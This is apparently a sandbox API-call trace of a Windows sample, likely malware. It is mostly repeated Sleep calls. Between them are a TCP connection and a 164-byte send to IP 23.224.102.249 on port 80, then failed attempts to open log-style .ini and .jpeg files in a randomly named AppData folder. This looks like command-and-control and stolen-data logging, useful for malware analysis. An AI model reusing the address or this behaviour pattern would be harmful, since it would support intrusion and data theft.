[0221.257] Sleep (dwMilliseconds=0x7d0) [0221.261] Sleep (dwMilliseconds=0x7d0) [0221.262] Sleep (dwMilliseconds=0x7d0) [0221.264] Sleep (dwMilliseconds=0x7d0) [0221.265] Sleep (dwMilliseconds=0x7d0) [0221.267] Sleep (dwMilliseconds=0x7d0) [0221.273] Sleep (dwMilliseconds=0x7d0) [0221.275] Sleep (dwMilliseconds=0x7d0) [0221.276] Sleep (dwMilliseconds=0x7d0) [0221.278] Sleep (dwMilliseconds=0x7d0) [0221.283] Sleep (dwMilliseconds=0x7d0) [0221.286] Sleep (dwMilliseconds=0x7d0) [0221.287] Sleep (dwMilliseconds=0x7d0) [0221.289] Sleep (dwMilliseconds=0x7d0) [0221.305] Sleep (dwMilliseconds=0x7d0) [0221.307] Sleep (dwMilliseconds=0x7d0) [0221.308] Sleep (dwMilliseconds=0x7d0) [0221.310] Sleep (dwMilliseconds=0x7d0) [0221.317] Sleep (dwMilliseconds=0x7d0) [0221.318] Sleep (dwMilliseconds=0x7d0) [0221.320] Sleep (dwMilliseconds=0x7d0) [0221.321] Sleep (dwMilliseconds=0x7d0) [0221.323] Sleep (dwMilliseconds=0x7d0) [0221.325] Sleep (dwMilliseconds=0x7d0) [0221.327] Sleep (dwMilliseconds=0x7d0) [0221.328] Sleep (dwMilliseconds=0x7d0) [0221.330] Sleep (dwMilliseconds=0x7d0) [0221.331] Sleep (dwMilliseconds=0x7d0) [0221.333] Sleep (dwMilliseconds=0x7d0) [0221.337] Sleep (dwMilliseconds=0x7d0) [0221.339] Sleep (dwMilliseconds=0x7d0) [0221.340] Sleep (dwMilliseconds=0x7d0) [0221.342] Sleep (dwMilliseconds=0x7d0) [0221.346] Sleep (dwMilliseconds=0x7d0) [0221.348] Sleep (dwMilliseconds=0x7d0) [0221.349] Sleep (dwMilliseconds=0x7d0) [0221.351] Sleep (dwMilliseconds=0x7d0) [0221.352] Sleep (dwMilliseconds=0x7d0) [0221.354] Sleep (dwMilliseconds=0x7d0) [0221.358] Sleep (dwMilliseconds=0x7d0) [0221.359] Sleep (dwMilliseconds=0x7d0) [0221.361] Sleep (dwMilliseconds=0x7d0) [0221.362] Sleep (dwMilliseconds=0x7d0) [0221.364] Sleep (dwMilliseconds=0x7d0) [0221.365] Sleep (dwMilliseconds=0x7d0) [0221.367] Sleep (dwMilliseconds=0x7d0) [0221.368] Sleep (dwMilliseconds=0x7d0) [0221.371] Sleep (dwMilliseconds=0x7d0) [0221.372] Sleep (dwMilliseconds=0x7d0) [0221.374] Sleep (dwMilliseconds=0x7d0) [0221.439] Sleep (dwMilliseconds=0x7d0) [0221.445] Sleep (dwMilliseconds=0x7d0) [0221.446] Sleep (dwMilliseconds=0x7d0) [0221.448] Sleep (dwMilliseconds=0x7d0) [0221.453] Sleep (dwMilliseconds=0x7d0) [0221.455] Sleep (dwMilliseconds=0x7d0) [0221.457] Sleep (dwMilliseconds=0x7d0) [0221.458] Sleep (dwMilliseconds=0x7d0) [0221.459] Sleep (dwMilliseconds=0x7d0) [0221.464] Sleep (dwMilliseconds=0x7d0) [0221.465] Sleep (dwMilliseconds=0x7d0) [0221.467] Sleep (dwMilliseconds=0x7d0) [0221.468] Sleep (dwMilliseconds=0x7d0) [0221.471] Sleep (dwMilliseconds=0x7d0) [0221.473] Sleep (dwMilliseconds=0x7d0) [0221.474] Sleep (dwMilliseconds=0x7d0) [0221.476] Sleep (dwMilliseconds=0x7d0) [0221.477] Sleep (dwMilliseconds=0x7d0) [0221.479] Sleep (dwMilliseconds=0x7d0) [0221.480] Sleep (dwMilliseconds=0x7d0) [0221.482] Sleep (dwMilliseconds=0x7d0) [0221.486] Sleep (dwMilliseconds=0x7d0) [0221.487] Sleep (dwMilliseconds=0x7d0) [0221.489] Sleep (dwMilliseconds=0x7d0) [0221.490] Sleep (dwMilliseconds=0x7d0) [0221.492] Sleep (dwMilliseconds=0x7d0) [0221.493] Sleep (dwMilliseconds=0x7d0) [0221.497] Sleep (dwMilliseconds=0x7d0) [0221.498] Sleep (dwMilliseconds=0x7d0) [0221.500] Sleep (dwMilliseconds=0x7d0) [0221.501] Sleep (dwMilliseconds=0x7d0) [0221.504] Sleep (dwMilliseconds=0x7d0) [0221.509] Sleep (dwMilliseconds=0x7d0) [0221.511] Sleep (dwMilliseconds=0x7d0) [0221.535] Sleep (dwMilliseconds=0x7d0) [0221.536] Sleep (dwMilliseconds=0x7d0) [0221.538] Sleep (dwMilliseconds=0x7d0) [0221.539] Sleep (dwMilliseconds=0x7d0) [0221.541] Sleep (dwMilliseconds=0x7d0) [0221.545] Sleep (dwMilliseconds=0x7d0) [0221.547] Sleep (dwMilliseconds=0x7d0) [0221.548] Sleep (dwMilliseconds=0x7d0) [0221.550] Sleep (dwMilliseconds=0x7d0) [0221.551] Sleep (dwMilliseconds=0x7d0) [0221.562] Sleep (dwMilliseconds=0x7d0) [0221.564] Sleep (dwMilliseconds=0x7d0) [0221.566] Sleep (dwMilliseconds=0x7d0) [0221.568] Sleep (dwMilliseconds=0x7d0) [0221.569] Sleep (dwMilliseconds=0x7d0) [0221.572] Sleep (dwMilliseconds=0x7d0) [0221.580] Sleep (dwMilliseconds=0x7d0) [0221.582] Sleep (dwMilliseconds=0x7d0) [0221.584] Sleep (dwMilliseconds=0x7d0) [0221.588] Sleep (dwMilliseconds=0x7d0) [0221.590] Sleep (dwMilliseconds=0x7d0) [0221.591] Sleep (dwMilliseconds=0x7d0) [0221.593] Sleep (dwMilliseconds=0x7d0) [0221.594] Sleep (dwMilliseconds=0x7d0) [0221.600] Sleep (dwMilliseconds=0x7d0) [0221.601] Sleep (dwMilliseconds=0x7d0) [0221.603] Sleep (dwMilliseconds=0x7d0) [0221.604] Sleep (dwMilliseconds=0x7d0) [0221.606] Sleep (dwMilliseconds=0x7d0) [0221.607] Sleep (dwMilliseconds=0x7d0) [0221.609] Sleep (dwMilliseconds=0x7d0) [0221.610] Sleep (dwMilliseconds=0x7d0) [0221.612] Sleep (dwMilliseconds=0x7d0) [0221.614] Sleep (dwMilliseconds=0x7d0) [0221.615] Sleep (dwMilliseconds=0x7d0) [0221.616] Sleep (dwMilliseconds=0x7d0) [0221.618] Sleep (dwMilliseconds=0x7d0) [0221.622] Sleep (dwMilliseconds=0x7d0) [0221.624] Sleep (dwMilliseconds=0x7d0) [0221.827] Sleep (dwMilliseconds=0x7d0) [0222.152] Sleep (dwMilliseconds=0x7d0) [0222.248] Sleep (dwMilliseconds=0x7d0) [0222.357] Sleep (dwMilliseconds=0x7d0) [0222.490] Sleep (dwMilliseconds=0x7d0) [0222.606] Sleep (dwMilliseconds=0x7d0) [0222.699] Sleep (dwMilliseconds=0x7d0) [0222.783] Sleep (dwMilliseconds=0x7d0) [0222.795] Sleep (dwMilliseconds=0x7d0) [0222.882] socket (af=2, type=1, protocol=6) returned 0x1c68 [0222.884] connect (s=0x1c68, name=0x9f94930*(sa_family=2, sin_port=0x50, sin_addr="23.224.102.249"), namelen=16) returned 0 [0223.095] send (s=0x1c68, buf=0x82e10fa*, len=164, flags=0) returned 164 [0223.095] setsockopt (s=0x1c68, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0223.096] recv (in: s=0x1c68, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040) returned 0 [0223.253] closesocket (s=0x1c68) returned 0 [0223.254] Sleep (dwMilliseconds=0x7d0) [0223.256] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.256] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.258] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0223.258] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.258] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.258] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.258] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.258] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.258] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.259] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.259] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.259] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.259] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.259] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.259] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.259] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.259] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.259] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.259] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.259] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.259] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f77d0) returned 1 [0223.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.260] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.260] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.260] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.260] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.260] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.260] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.260] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.260] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.260] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.260] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.260] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.260] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.260] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.260] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0223.260] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7500) returned 1 [0223.260] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.260] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.260] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0223.260] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0223.260] Sleep (dwMilliseconds=0x7d0) [0223.262] Sleep (dwMilliseconds=0x7d0) [0223.264] Sleep (dwMilliseconds=0x7d0) [0223.266] Sleep (dwMilliseconds=0x7d0) [0223.267] Sleep (dwMilliseconds=0x7d0) [0223.269] Sleep (dwMilliseconds=0x7d0) [0223.270] Sleep (dwMilliseconds=0x7d0) [0223.272] Sleep (dwMilliseconds=0x7d0) [0223.273] Sleep (dwMilliseconds=0x7d0) [0223.275] Sleep (dwMilliseconds=0x7d0) [0223.276] Sleep (dwMilliseconds=0x7d0) [0223.278] Sleep (dwMilliseconds=0x7d0) [0223.279] Sleep (dwMilliseconds=0x7d0) [0223.281] Sleep (dwMilliseconds=0x7d0) [0223.282] Sleep (dwMilliseconds=0x7d0) [0223.284] Sleep (dwMilliseconds=0x7d0) [0223.286] Sleep (dwMilliseconds=0x7d0) [0223.288] Sleep (dwMilliseconds=0x7d0) [0223.301] Sleep (dwMilliseconds=0x7d0) [0223.304] Sleep (dwMilliseconds=0x7d0) [0223.320] Sleep (dwMilliseconds=0x7d0) [0223.324] Sleep (dwMilliseconds=0x7d0) [0223.326] Sleep (dwMilliseconds=0x7d0) [0223.327] Sleep (dwMilliseconds=0x7d0) [0223.330] Sleep (dwMilliseconds=0x7d0) [0223.332] Sleep (dwMilliseconds=0x7d0) [0223.334] Sleep (dwMilliseconds=0x7d0) [0223.336] Sleep (dwMilliseconds=0x7d0) [0223.337] Sleep (dwMilliseconds=0x7d0) [0223.339] Sleep (dwMilliseconds=0x7d0) [0223.343] Sleep (dwMilliseconds=0x7d0) [0223.345] Sleep (dwMilliseconds=0x7d0) [0223.346] Sleep (dwMilliseconds=0x7d0) [0223.348] Sleep (dwMilliseconds=0x7d0) [0223.349] Sleep (dwMilliseconds=0x7d0) [0223.351] Sleep (dwMilliseconds=0x7d0) [0223.353] Sleep (dwMilliseconds=0x7d0) [0223.355] Sleep (dwMilliseconds=0x7d0) [0223.356] Sleep (dwMilliseconds=0x7d0) [0223.358] Sleep (dwMilliseconds=0x7d0) [0223.359] Sleep (dwMilliseconds=0x7d0) [0223.361] Sleep (dwMilliseconds=0x7d0) [0223.362] Sleep (dwMilliseconds=0x7d0) [0223.363] Sleep (dwMilliseconds=0x7d0) [0223.365] Sleep (dwMilliseconds=0x7d0) [0223.366] Sleep (dwMilliseconds=0x7d0) [0223.368] Sleep (dwMilliseconds=0x7d0) [0223.369] Sleep (dwMilliseconds=0x7d0) [0223.373] Sleep (dwMilliseconds=0x7d0) [0223.374] Sleep (dwMilliseconds=0x7d0) [0223.376] Sleep (dwMilliseconds=0x7d0) [0223.377] Sleep (dwMilliseconds=0x7d0) [0223.379] Sleep (dwMilliseconds=0x7d0) [0223.380] Sleep (dwMilliseconds=0x7d0) [0223.382] Sleep (dwMilliseconds=0x7d0) [0223.384] Sleep (dwMilliseconds=0x7d0) [0223.386] Sleep (dwMilliseconds=0x7d0) [0223.387] Sleep (dwMilliseconds=0x7d0) [0223.389] Sleep (dwMilliseconds=0x7d0) [0223.390] Sleep (dwMilliseconds=0x7d0) [0223.392] Sleep (dwMilliseconds=0x7d0) [0223.393] Sleep (dwMilliseconds=0x7d0) [0223.395] Sleep (dwMilliseconds=0x7d0) [0223.396] Sleep (dwMilliseconds=0x7d0) [0223.399] Sleep (dwMilliseconds=0x7d0) [0223.400] Sleep (dwMilliseconds=0x7d0) [0223.402] Sleep (dwMilliseconds=0x7d0) [0223.403] Sleep (dwMilliseconds=0x7d0) [0223.406] Sleep (dwMilliseconds=0x7d0) [0223.408] Sleep (dwMilliseconds=0x7d0) [0223.409] Sleep (dwMilliseconds=0x7d0) [0223.411] Sleep (dwMilliseconds=0x7d0) [0223.412] Sleep (dwMilliseconds=0x7d0) [0223.414] Sleep (dwMilliseconds=0x7d0) [0223.415] Sleep (dwMilliseconds=0x7d0) [0223.417] Sleep (dwMilliseconds=0x7d0) [0223.419] Sleep (dwMilliseconds=0x7d0) [0223.420] Sleep (dwMilliseconds=0x7d0) [0223.422] Sleep (dwMilliseconds=0x7d0) [0223.423] Sleep (dwMilliseconds=0x7d0) [0223.425] Sleep (dwMilliseconds=0x7d0) [0223.426] Sleep (dwMilliseconds=0x7d0) [0223.428] Sleep (dwMilliseconds=0x7d0) [0223.430] Sleep (dwMilliseconds=0x7d0) [0223.431] Sleep (dwMilliseconds=0x7d0) [0223.433] Sleep (dwMilliseconds=0x7d0) [0223.435] Sleep (dwMilliseconds=0x7d0) [0223.437] Sleep (dwMilliseconds=0x7d0) [0223.438] Sleep (dwMilliseconds=0x7d0) [0223.439] Sleep (dwMilliseconds=0x7d0) [0223.441] Sleep (dwMilliseconds=0x7d0) [0223.442] Sleep (dwMilliseconds=0x7d0) [0223.444] Sleep (dwMilliseconds=0x7d0) [0223.445] Sleep (dwMilliseconds=0x7d0) [0223.447] Sleep (dwMilliseconds=0x7d0) [0223.448] Sleep (dwMilliseconds=0x7d0) [0223.450] Sleep (dwMilliseconds=0x7d0) [0223.452] Sleep (dwMilliseconds=0x7d0) [0223.454] Sleep (dwMilliseconds=0x7d0) [0223.455] Sleep (dwMilliseconds=0x7d0) [0223.457] Sleep (dwMilliseconds=0x7d0) [0223.458] Sleep (dwMilliseconds=0x7d0) [0223.460] Sleep (dwMilliseconds=0x7d0) [0223.462] Sleep (dwMilliseconds=0x7d0) [0223.463] Sleep (dwMilliseconds=0x7d0) [0223.465] Sleep (dwMilliseconds=0x7d0) [0223.466] Sleep (dwMilliseconds=0x7d0) [0223.468] Sleep (dwMilliseconds=0x7d0) [0223.469] Sleep (dwMilliseconds=0x7d0) [0223.472] Sleep (dwMilliseconds=0x7d0) [0223.474] Sleep (dwMilliseconds=0x7d0) [0223.475] Sleep 